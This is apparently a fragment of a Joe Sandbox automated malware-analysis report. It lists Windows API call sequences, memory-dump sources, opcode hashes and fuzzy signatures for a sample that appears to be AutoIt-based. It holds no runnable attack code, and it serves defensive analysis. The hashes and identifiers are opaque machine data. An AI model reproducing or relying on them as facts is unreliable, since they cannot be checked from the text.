                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                                    • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                    • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                                                    • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                    • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$Copy$ClearErrorLast
                                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                    • API String ID: 2487901850-572801152
                                                                                                                                                    • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                    • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                                                    • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                    • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Enable$Show$MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1871949834-0
                                                                                                                                                    • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                    • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                                                    • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                    • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                    • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                                                    • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                    • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                                                    APIs
                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                                                    • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                                                    • SendMessageW.USER32 ref: 00471AE3
                                                                                                                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3611059338-0
                                                                                                                                                    • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                    • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                                                    • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                    • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                                                    APIs
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1640429340-0
                                                                                                                                                    • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                                    • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                                                    • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                                    • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                    • _wcslen.LIBCMT ref: 004438CD
                                                                                                                                                    • _wcslen.LIBCMT ref: 004438E6
                                                                                                                                                    • _wcstok.LIBCMT ref: 004438F8
                                                                                                                                                    • _wcslen.LIBCMT ref: 0044390C
                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                                                    • _wcstok.LIBCMT ref: 00443931
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3632110297-0
                                                                                                                                                    • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                                    • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                                                                    • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                                    • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                                                                    APIs
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Destroy$DeleteMenuObject$IconWindow
• String ID:
• API String ID: 752480666-0
• Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
• Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
• Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
• Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
APIs
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
• Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
• Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
• Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
• Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
APIs
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
• Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
• Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
• Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
• Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
APIs
• Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
• QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
• Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
• Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
• Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
APIs
• SendMessageW.USER32 ref: 004555C7
• SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconWindow
• String ID:
• API String ID: 3691411573-0
• Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
• Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
• Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
• Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
• LineTo.GDI32(?,?,?), ref: 004472AC
• MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
• LineTo.GDI32(?,?,?), ref: 004472C6
• EndPath.GDI32(?), ref: 004472D6
• StrokePath.GDI32(?), ref: 004472E4
Similarity
• API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
• String ID:
• API String ID: 372113273-0
• Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
• Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
• Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
• Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
APIs
• GetDC.USER32(00000000), ref: 0044CC6D
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
• ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                    • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                    • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                                                    • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                    • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd.LIBCMT ref: 0041708E
                                                                                                                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                    • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                                                                    • __lock.LIBCMT ref: 004170BE
                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                                                                    • _free.LIBCMT ref: 004170EE
                                                                                                                                                    • InterlockedIncrement.KERNEL32(02FB17F0), ref: 00417106
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3470314060-0
                                                                                                                                                    • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                                                                                    • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                                                                    • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                                                                                    • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                                                      • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                                    • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                    • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                                                    • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                                    • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                                                    APIs
                                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                                    • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                    • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                                                    • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                    • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                                                    APIs
                                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                    • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 442100245-0
                                                                                                                                                    • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                                    • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                                                                    • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                                    • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                                                    • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                                                    • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
• String ID: 0
• API String ID: 621800784-4108050209
• Opcode ID: 27a8d1a391d44048803f5840ac21889e260530b75c30abb05853da563ac7c2fc
• Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
• Opcode Fuzzy Hash: 27a8d1a391d44048803f5840ac21889e260530b75c30abb05853da563ac7c2fc
• Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SetErrorMode.KERNEL32 ref: 004781CE
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• SetErrorMode.KERNEL32(?), ref: 00478270
• SetErrorMode.KERNEL32(?), ref: 00478340
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ErrorMode$AttributesFile_memmove_wcslen
• String ID: \VH
• API String ID: 3884216118-234962358
• Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
• Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
• Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
• Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
